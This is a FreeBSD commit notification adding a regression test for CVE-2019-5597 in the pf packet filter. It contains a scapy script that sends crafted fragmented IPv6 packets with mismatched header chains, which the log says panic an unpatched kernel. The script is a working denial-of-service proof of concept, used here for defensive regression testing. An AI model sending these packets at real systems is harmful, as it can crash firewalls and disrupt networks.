svn commit: r344793 - stable/12/tests/sys/netpfil/pf
Kristof Provost
kp at FreeBSD.org
Tue Mar 5 08:45:08 UTC 2019
Author: kp
Date: Tue Mar 5 08:45:07 2019
New Revision: 344793
URL: https://svnweb.freebsd.org/changeset/base/344793
Log:
MFC r344692:
pf tests: Test CVE-2019-5597
Generate a fragmented packet with different header chains, to provoke
the incorrect behaviour of pf.
Without the fix this will trigger a panic.
Obtained from: Corentin Bayet, Nicolas Collignon, Luca Moro at Synacktiv
Added:
stable/12/tests/sys/netpfil/pf/CVE-2019-5597.py
- copied unchanged from r344692, head/tests/sys/netpfil/pf/CVE-2019-5597.py
Modified:
stable/12/tests/sys/netpfil/pf/Makefile
stable/12/tests/sys/netpfil/pf/fragmentation.sh
Directory Properties:
stable/12/ (props changed)
Copied: stable/12/tests/sys/netpfil/pf/CVE-2019-5597.py (from r344692, head/tests/sys/netpfil/pf/CVE-2019-5597.py)
==============================================================================
--- /dev/null 00:00:00 1970 (empty, because file is newly added)
+++ stable/12/tests/sys/netpfil/pf/CVE-2019-5597.py Tue Mar 5 08:45:07 2019 (r344793, copy of r344692, head/tests/sys/netpfil/pf/CVE-2019-5597.py)
@@ -0,0 +1,35 @@
+#!/usr/local/bin/python2.7
+
+import random
+import scapy.all as sp
+import sys
+
+UDP_PROTO = 17
+AH_PROTO = 51
+FRAG_PROTO = 44
+
+def main():
+ intf = sys.argv[1]
+ ipv6_src = sys.argv[2]
+ ipv6_dst = sys.argv[3]
+
+ ipv6_main = sp.IPv6(dst=ipv6_dst, src=ipv6_src)
+
+ padding = 8
+ fid = random.randint(0,100000)
+ frag_0 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=1, offset=0)
+ frag_1 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=0, offset=padding/8)
+
+ pkt1_opts = sp.AH(nh=AH_PROTO, payloadlen=200) \
+ / sp.Raw('XXXX' * 199) \
+ / sp.AH(nh=FRAG_PROTO, payloadlen=1) \
+ / frag_1
+
+ pkt0 = sp.Ether() / ipv6_main / frag_0 / sp.Raw('A' * padding)
+ pkt1 = sp.Ether() / ipv6_main / pkt1_opts / sp.Raw('B' * padding)
+
+ sp.sendp(pkt0, iface=intf, verbose=False)
+ sp.sendp(pkt1, iface=intf, verbose=False)
+
+if __name__ == '__main__':
+ main()
Modified: stable/12/tests/sys/netpfil/pf/Makefile
==============================================================================
--- stable/12/tests/sys/netpfil/pf/Makefile Tue Mar 5 08:33:14 2019 (r344792)
+++ stable/12/tests/sys/netpfil/pf/Makefile Tue Mar 5 08:45:07 2019 (r344793)
@@ -19,8 +19,10 @@ ATF_TESTS_SH+= anchor \
${PACKAGE}FILES+= utils.subr \
echo_inetd.conf \
- pft_ping.py
+ pft_ping.py \
+ CVE-2019-5597.py
${PACKAGE}FILESMODE_pft_ping.py= 0555
+${PACKAGE}FILESMODE_CVE-2019-5597.py= 0555
.include <bsd.test.mk>
Modified: stable/12/tests/sys/netpfil/pf/fragmentation.sh
==============================================================================
--- stable/12/tests/sys/netpfil/pf/fragmentation.sh Tue Mar 5 08:33:14 2019 (r344792)
+++ stable/12/tests/sys/netpfil/pf/fragmentation.sh Tue Mar 5 08:45:07 2019 (r344793)
@@ -104,6 +104,11 @@ v6_body()
atf_check -s exit:0 -o ignore\
ping6 -c 1 -b 70000 -s 65000 2001:db8:43::3
+
+ $(atf_get_srcdir)/CVE-2019-5597.py \
+ ${epair_send}a \
+ 2001:db8:42::1 \
+ 2001:db8:43::3
}
v6_cleanup()
More information about the svn-src-all
mailing list